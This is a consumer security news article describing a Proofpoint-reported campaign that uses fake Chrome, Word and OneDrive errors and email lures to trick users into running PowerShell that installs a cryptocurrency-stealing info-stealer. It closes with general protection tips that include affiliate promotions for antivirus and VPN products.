Proofpoint identified a larger distribution of the fake update malware earlier this month, but the online protection firm believes the campaign has been ongoing since March 2024. The malware poses as fake Google Chrome, Word, and OneDrive errors to coerce users into downloading harmful code. These errors prompt the visitor to click a button to copy a PowerShell “fix” into the clipboard, then paste and run it in a Run dialog or PowerShell prompt.
“Although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk,” warns ProofPoint.
When the PowerShell script runs, it checks if the device is a valid target. Then, it downloads more payloads. These steps include clearing the DNS cache, removing clipboard content, showing a fake message, and downloading another remote PowerShell script.
Cryptocurrency Theft
This second script checks if it’s running on a virtual machine before downloading an info-stealer. Once everything is ready, the hacker can access the victim’s cryptocurrency. This scheme redirects the victim’s funds to the hacker instead of the intended recipient.
Alternative Attack Method: Email Lure
Proofpoint notes that bad actors also use another method called “email lure” to install harmful software. Emails, typically those that appear to be work- or corporate-related, contain an HTML file that resembles Microsoft Word. These emails prompt users to install the “Word Online” extension to view the document correctly. Similar to the method above, users are prompted to open PowerShell and copy over malicious code.
Proofpoint says the deceptive “campaign” is widespread. “The campaign included over 100,000 messages and targeted thousands of organizations globally,” according to the firm.
5 Ways to Protect Yourself from Harmful Software
- Have strong antivirus software: The best way to protect yourself from clicking malicious links that install malware that may get access to your private information is to have antivirus protection installed on all your devices. This can also alert you of any phishing emails or ransomware scams. My top pick is TotalAV, and you can get a limited-time deal for CyberGuy readers: your first year (80% off) for the TotalAV Antivirus Pro package.
- Use a VPN: Consider using a VPN to protect against being tracked and to identify your potential location on websites that you visit. Many sites can read your IP address and, depending on their privacy settings, may display the city from which you are corresponding. A VPN will disguise your IP address to show an alternate location. My top recommendation is ExpressVPN. It has a quick and easy setup, is available in 105 countries, and will not log your IP address, browsing history, traffic destination or metadata, or DNS queries. Right now, you can get 3 extra months FREE with a 12-month ExpressVPN plan. That’s just .67 per month, a savings of 49%! Try it risk-free for 30 days.
- Monitor your accounts: Regularly review your bank statements, credit card statements, and other financial accounts for any unauthorized activity. If you notice any suspicious transactions, report them immediately to your bank or credit card company.
- Place a fraud alert: Contact one of the three major credit reporting agencies (Equifax, Experian, or TransUnion) and request a fraud alert to be placed on your credit file. This will make it more difficult for identity thieves to open new accounts in your name without verification.
- Enable two-factor authentication: Enable two-factor authentication whenever possible. This adds an extra layer of security by requiring a second form of identification in addition to your password.
